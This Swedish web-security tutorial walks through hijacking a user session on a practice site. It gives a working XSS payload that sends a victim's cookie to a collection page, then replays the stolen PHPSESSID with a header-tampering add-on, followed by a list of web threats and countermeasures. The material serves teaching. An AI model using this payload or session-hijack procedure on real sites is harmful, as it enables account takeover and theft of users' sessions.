Hur hackar man en webbplats? Vanliga webbplatshackningstekniker
Tekniker för hackning av webbplatser
Fler människor har tillgång till internet än någonsin tidigare. Detta har fått många organisationer att utveckla webbaserade applikationer som användare kan använda online för att interagera med organisationen. Dåligt skriven kod för webbapplikationer kan utnyttjas för att få obehörig åtkomst till känslig data och webbservrar.
I den här handledningen kommer du att lära dig hur du hackar webbplatser, och vi kommer att presentera dig för tekniker för hackning av webbapplikationer och motåtgärder du kan sätta på plats för att skydda mot sådana attacker.
Hur man hackar en webbplats
I detta praktiska scenario för webbplatshackning kommer vi att kapa användarsessionen för webbapplikationen som finns på www.techpanda.org. Vi kommer att använda cross site scripting för att läsa cookie-sessions-id:t och sedan använda det för att imitera en legitim användarsession.
Antagandet som görs är att angriparen har tillgång till webbapplikationen och han skulle vilja kapa sessioner för andra användare som använder samma applikation. Målet med denna attack kan vara att få administratörsåtkomst till webbapplikationen förutsatt att angriparens åtkomstkonto är begränsat.
Steg 1) Öppna URL http://www.techpanda.org/.
För övningsändamål rekommenderas det starkt att få åtkomst med SQL Injection. Hänvisa till detta Artikeln för mer information om hur du gör det.
Steg 2) Ange inloggningsuppgifter.
Inloggningsmailen är admin@google.com, lösenordet är Password2010.
Steg 3) Kontrollera instrumentpanelen.
Om du har loggat in framgångsrikt får du följande instrumentpanel
Steg 4) Ange nytt innehåll.
Klicka på Lägg till ny kontakt och ange följande som förnamn
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
Steg 5) Lägg till Javascript.
Ovanstående kod använder JavaScript. Den lägger till en hyperlänk med en onclick-händelse. När den intet ont anande användaren klickar på länken hämtar händelsen PHP cookie-sessions-ID och skickar det till snatch_sess_id.php
sida tillsammans med sessions-id:t i URL:en
Steg 6) Lägg till detaljer.
Ange de återstående uppgifterna enligt nedan och klicka på Spara ändringar
Steg 7) Kontrollera instrumentpanelen.
Din instrumentpanel kommer nu att se ut som följande skärm
Steg 8) Kontrollera sessions-id.
Anmärkningar: Skriptet kan skicka värdet till någon fjärrserver där PHPSESSID lagras och sedan omdirigeras användaren tillbaka till webbplatsen som om ingenting hade hänt.
Anmärkningar: värdet du får kan skilja sig från det på den här webbsidan hacka handledning, men konceptet är detsamma
Sessionsidentifiering med hjälp av Firefox och Tamper Data-tillägget
Flödesschemat nedan visar de steg som du måste ta för att slutföra den här övningen.
- Du behöver Firefox webbläsare för detta avsnitt och tillägget Tamper Data
- Öppen Firefox och installera tillägget som visas i diagrammen nedan
- Sök efter manipuleringsdata och klicka sedan på installera som visas ovan
- Klicka på Acceptera och installera...
- Klicka på Starta om nu när installationen är klar
- Aktivera menyraden i Firefox om det inte visas
- Klicka på verktygsmenyn och välj sedan Tamper Data som visas nedan
- Du får följande fönster. Obs: Om Windows är inte tom, tryck på rensa-knappen
- Klicka på menyn Starta sabotage
- Växla tillbaka till Firefox webbläsare, typ http://www.techpanda.org/dashboard.php tryck sedan på enter-tangenten för att ladda sidan
- Du kommer att få följande popup från Tamper Data
- Popup-fönstret har tre (3) alternativ. Alternativet Tamper låter dig ändra HTTP-huvudinformationen innan den skickas till servern.
- Klicka på det
- Du kommer att få upp följande fönster
- kopiera PHP session ID du kopierade från attackens URL och klistrade in den efter likhetstecknet. Ditt värde ska nu se ut så här
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
- Klicka på OK-knappen
- Du kommer att få upp popup-fönstret för sabotagedata igen
- Avmarkera kryssrutan som frågar Fortsätt manipulera?
- Klicka på Skicka-knappen när du är klar
- Du bör kunna se instrumentpanelen som visas nedan
Anmärkningar: vi loggade inte in, vi efterliknade en inloggningssession med PHPSESSID-värdet som vi hämtade med cross site scripting
Vad är en webbapplikation? Vad är webbhot?
En webbapplikation (alias webbplats) är en applikation baserad på klient-servermodellen. De server ger databasåtkomst och affärslogik. Den finns på en webbserver. Klientapplikationen körs på klientens webbläsare. Webbapplikationer är oftast skrivna på språk som t.ex Java, C# och VB.Net, PHP, ColdFusion Markup Language, etc. databasmotorerna som används i webbapplikationer inkluderar MySQL, MS SQL Server, PostgreSQL, SQLiteEtc.
Bästa hackningstekniker för webbplatser
De flesta webbapplikationer finns på offentliga servrar som är tillgängliga via Internet. Detta gör dem sårbara för attacker på grund av lättillgänglighet. Följande är vanliga webbapplikationshot.
- SQL Injection – Målet med detta hot kan vara att kringgå inloggningsalgoritmer, sabotera data, etc.
- Förnekande av serviceangrepp– Målet med detta hot kan vara att neka legitima användare tillgång till resursen
- Cross Site Scripting XSS– Målet med detta hot kan vara att injicera kod som kan köras på klientsidans webbläsare.
- Cookie/sessionsförgiftning– Målet med detta hot är att modifiera cookies/sessionsdata av en angripare för att få obehörig åtkomst.
- Formmanipulering – Målet med detta hot är att modifiera formulärdata såsom priser i e-handelsapplikationer så att angriparen kan få varor till reducerade priser.
- Kodinjektion – Målet med detta hot är att injicera kod som PHP, Python, etc. som kan köras på servern. Koden kan installera bakdörrar, avslöja känslig information, etc.
- förvanskning– Målet med detta hot är att ändra sidan som visats på en webbplats och omdirigera alla sidförfrågningar till en enda sida som innehåller angriparens meddelande.
Hur skyddar du din webbplats mot hacks?
En organisation kan anta följande policy för att skydda sig mot webbserverattacker.
- SQL Injection – sanering och validering av användarparametrar innan de skickas till databasen för bearbetning kan bidra till att minska risken för att bli attackerad via SQL Injection. Databasmotorer som MS SQL Server, MySQL, etc. stödparametrar och förberedda uttalanden. De är mycket säkrare än traditionella SQL-satser
- Denial of Service-attacker – brandväggar kan användas för att släppa trafik från en misstänkt IP-adress om attacken är en enkel DoS. Korrekt konfiguration av nätverk och intrångsdetektionssystem kan också bidra till att minska risken för en DoS attack varit framgångsrik.
- Cross Site Scripting – validering och sanering av rubriker, parametrar som skickas via URL:en, formulärparametrar och dolda värden kan hjälpa till att minska XSS-attacker.
- Cookie/sessionsförgiftning – detta kan förhindras genom att kryptera innehållet i cookies, tidsgräns för cookies efter en tid, associera cookies med klientens IP-adress som användes för att skapa dem.
- Formhärdning – detta kan förhindras genom att validera och verifiera användarinmatningen innan den bearbetas.
- Kodinjektion – detta kan förhindras genom att behandla alla parametrar som data snarare än körbar kod. Sanering och validering kan användas för att implementera detta.
- Förnedring – en bra säkerhetspolicy för webbapplikationsutveckling bör säkerställa att den förseglar vanliga sårbarheter för att komma åt webbservern. Detta kan vara en korrekt konfiguration av operativsystemet, webbserverprogramvara och bästa säkerhetspraxis vid utveckling av webbapplikationer.
Sammanfattning
- En webbapplikation är baserad på server-klient-modellen. Klientsidan använder webbläsaren för att komma åt resurserna på servern.
- Webbapplikationer är vanligtvis tillgängliga över internet. Detta gör dem sårbara för attacker.
- Webbapplikationshot inkluderar SQL Injection, Code Injection, XSS, Defacement, Cookie-förgiftning, etc.
- En bra säkerhetspolicy när du utvecklar webbapplikationer kan hjälpa till att göra dem säkra.